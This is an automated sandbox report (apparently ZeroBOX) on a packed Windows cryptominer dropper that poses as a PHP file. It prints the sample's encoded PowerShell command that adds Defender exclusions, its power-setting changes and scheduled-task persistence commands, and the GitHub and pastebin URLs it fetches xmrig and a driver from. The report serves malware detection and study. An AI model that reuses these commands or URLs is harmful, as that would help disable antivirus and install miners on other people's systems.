Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	July 8, 2023, 1:58 p.m.	July 8, 2023, 2:01 p.m.

Size	3.5MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`2796bf32abbebdd11a35603f3453214d`
SHA256	`0edc6dae7ee848bf465be34edfc49377b7da304798445685e4a7d45d4983f166`
CRC32	`83570D40`
ssdeep	`98304:dK7rmuwY9IEUOJaMpTW0IX0WV2GnusfXd7FlwffC:g3muJ6IIEEt7Fl`
PDB Path	C:\Users\ÐÐ´Ð¼Ð¸Ð½Ð¸ÑÑÑÐ°ÑÐ¾Ñ\Downloads\Documents\2s74mt14qrl\output.pdb
Yara	UPX_Zero - UPX packed file OS_Processor_Check_Zero - OS Processor Check Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature IsPE32 - (no description)

class-wp-image-editors.php "C:\Users\test22\AppData\Local\Temp\class-wp-image-editors.php"
652
- AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2076
  - AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    53812
    - cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAEwATQBVAGkAYgB0AGMAaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEQANgBtAG0AMABFAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBqAGoAVQBNAFYATwAyAEsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwBLAHAATABVAGYAUgB1ACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
      53980
      - powershell.exe powershell -EncodedCommand "PAAjAEwATQBVAGkAYgB0AGMAaQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEQANgBtAG0AMABFAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBqAGoAVQBNAFYATwAyAEsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwBLAHAATABVAGYAUgB1ACMAPgA="
        54036
      - powercfg.exe powercfg /x -hibernate-timeout-ac 0
        54124
      - powercfg.exe powercfg /x -hibernate-timeout-dc 0
        54212
      - powercfg.exe powercfg /x -standby-timeout-ac 0
        53264
      - powercfg.exe powercfg /x -standby-timeout-dc 0
        53308
      - powercfg.exe powercfg /hibernate off
        53360
    - cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
      53416
      - schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        53536
    - cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1084" /TR "C:\ProgramData\Dllhost\dllhost.exe"
      53460
      - schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk1084" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        53556

Name	Response	Post-Analysis Lookup
pastebin.com	A 172.67.34.170 A 104.20.67.143 A 104.20.68.143	172.67.34.170
github.com	A 20.200.245.247	20.200.245.247

IP Address	Status	Action
104.20.68.143	Active	Moloch
164.124.101.2	Active	Moloch
20.200.245.247	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49176 -> 20.200.245.247:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49170 -> 104.20.68.143:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49175 -> 20.200.245.247:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.2 192.168.56.103:49176 20.200.245.247:443	C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1	C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=github.com	a3:b5:9e:5f:e8:84:ee:1f:34:d9:8e:ef:85:8e:3f:b6:62:ac:10:4a
TLS 1.2 192.168.56.103:49170 104.20.68.143:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	55:c8:82:61:30:05:42:80:db:47:5e:d0:66:b5:df:ac:14:5b:19:6f
TLS 1.2 192.168.56.103:49175 20.200.245.247:443	C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1	C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=github.com	a3:b5:9e:5f:e8:84:ee:1f:34:d9:8e:ef:85:8e:3f:b6:62:ac:10:4a

Queries for the computername (11 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 8, 2023, 1:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 8, 2023, 1:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 8, 2023, 1:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 8, 2023, 1:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 8, 2023, 1:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 8, 2023, 1:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 8, 2023, 1:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 8, 2023, 1:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 8, 2023, 1:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 8, 2023, 1:59 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 8, 2023, 1:59 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (8 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 8, 2023, 1:59 p.m.			0	0
IsDebuggerPresent July 8, 2023, 1:59 p.m.			0	0
IsDebuggerPresent July 8, 2023, 1:59 p.m.			0	0
IsDebuggerPresent July 8, 2023, 1:59 p.m.			0	0
IsDebuggerPresent July 8, 2023, 1:59 p.m.			0	0
IsDebuggerPresent July 8, 2023, 1:59 p.m.			0	0
IsDebuggerPresent July 8, 2023, 1:59 p.m.			0	0
IsDebuggerPresent July 8, 2023, 1:59 p.m.			0	0

Command line console output was observed (12 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: At line:1 char:30 console_handle: 0x00000047	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: + <#LMUibtci#> Add-MpPreference <<<< <#D6mm0Eu#> -ExclusionPath @($env:UserPro console_handle: 0x00000053	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: file,$env:SystemDrive) <#jjjUMVO2K#> -Force <#CKpLUfRu#> console_handle: 0x0000005f	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x0000006b	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: mmandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000083	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: Hibernation failed with the following error: The request is not supported. The following items are preventing hibernation on this system. The system firmware does not support hibernation. console_handle: 0x0000000b	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: SUCCESS: The scheduled task "NvStray\NvStrayService_bk1084" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW July 8, 2023, 1:59 p.m.	buffer: SUCCESS: The scheduled task "dllhost" has successfully been created. console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002c80e8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033bf78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033bf78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033bf78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c1f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c1f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c1f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c1f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c1f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c1f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033bf78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033bf78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033bf78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c0f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c0f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c0f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c138 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c0f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c0f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c0f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c0f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c0f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c0f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c0f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c278 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c278 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c278 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c278 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c278 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c278 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c278 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c278 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c278 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c278 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c278 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c278 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c278 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c278 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c338 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c338 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c338 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c338 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c338 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c338 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c338 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 8, 2023, 1:59 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0033c338 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

This executable has a PDB path (1 event)

pdb_path

C:\Users\ÐÐ´Ð¼Ð¸Ð½Ð¸ÑÑÑÐ°ÑÐ¾Ñ\Downloads\Documents\2s74mt14qrl\output.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 8, 2023, 1:59 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (4 events)

section	.textbss
section	.D11
section	.zdat
section	.00cfg

The executable uses a known packer (1 event)

packer

Microsoft Visual C++ V8.0 (Debug)

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ July 8, 2023, 1:58 p.m.	stacktrace: class-wp-image-editors+0x9b685 @ 0x11b685 class-wp-image-editors+0x9dd59 @ 0x11dd59 class-wp-image-editors+0x9e7ec @ 0x11e7ec RtlSelfRelativeToAbsoluteSD+0x1e8 TpPostWork-0x48 ntdll+0x78449 @ 0x77918449 TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x778e54f4 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.esp: 36632400 registers.edi: 38117376 registers.eax: 2076 registers.ebp: 36632456 registers.edx: 2130553844 registers.ebx: 5120 registers.esi: 2722824 registers.ecx: 2068	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

July 8, 2023, 1:58 p.m.

stacktrace:

class-wp-image-editors+0x9b685 @ 0x11b685
class-wp-image-editors+0x9dd59 @ 0x11dd59
class-wp-image-editors+0x9e7ec @ 0x11e7ec
RtlSelfRelativeToAbsoluteSD+0x1e8 TpPostWork-0x48 ntdll+0x78449 @ 0x77918449
TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x778e54f4
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.symbol:
exception.exception_code: 0xc0000005
exception.address: 0x0
registers.esp: 36632400
registers.edi: 38117376
registers.eax: 2076
registers.ebp: 36632456
registers.edx: 2130553844
registers.ebx: 5120
registers.esi: 2722824
registers.ecx: 2068

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (4 events)

suspicious_features	GET method with no useragent header	suspicious_request	GET https://pastebin.com/raw/PTNbBX9V
suspicious_features	GET method with no useragent header	suspicious_request	GET https://github.com/S1lentHash/xmrig/raw/main/xmrig.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://github.com/S1lentHash/file_to_dwnld/raw/main/WinRing0x64.sys
suspicious_features	GET method with no useragent header	suspicious_request	GET https://github.com/S1lentHash/newwatch/raw/main/NewNewWatch.exe

Performs some HTTP requests (4 events)

request	GET https://pastebin.com/raw/PTNbBX9V
request	GET https://github.com/S1lentHash/xmrig/raw/main/xmrig.exe
request	GET https://github.com/S1lentHash/file_to_dwnld/raw/main/WinRing0x64.sys
request	GET https://github.com/S1lentHash/newwatch/raw/main/NewNewWatch.exe

Allocates read-write-execute memory (usually to unpack itself) (50 out of 222 events)

Time & API	Arguments	Status
NtProtectVirtualMemory July 8, 2023, 1:58 p.m.	process_identifier: 652 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003b3000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:58 p.m.	process_identifier: 652 region_size: 1490944 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022f0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2076 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004cb000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2076 region_size: 49152 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xc8b60000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74352000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 region_size: 1769472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008a0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73522000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7442b000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ee1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ee2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 region_size: 1703936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02480000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x741ea000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005d6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005da000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f51000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73db1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005ca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff50000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 53812 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
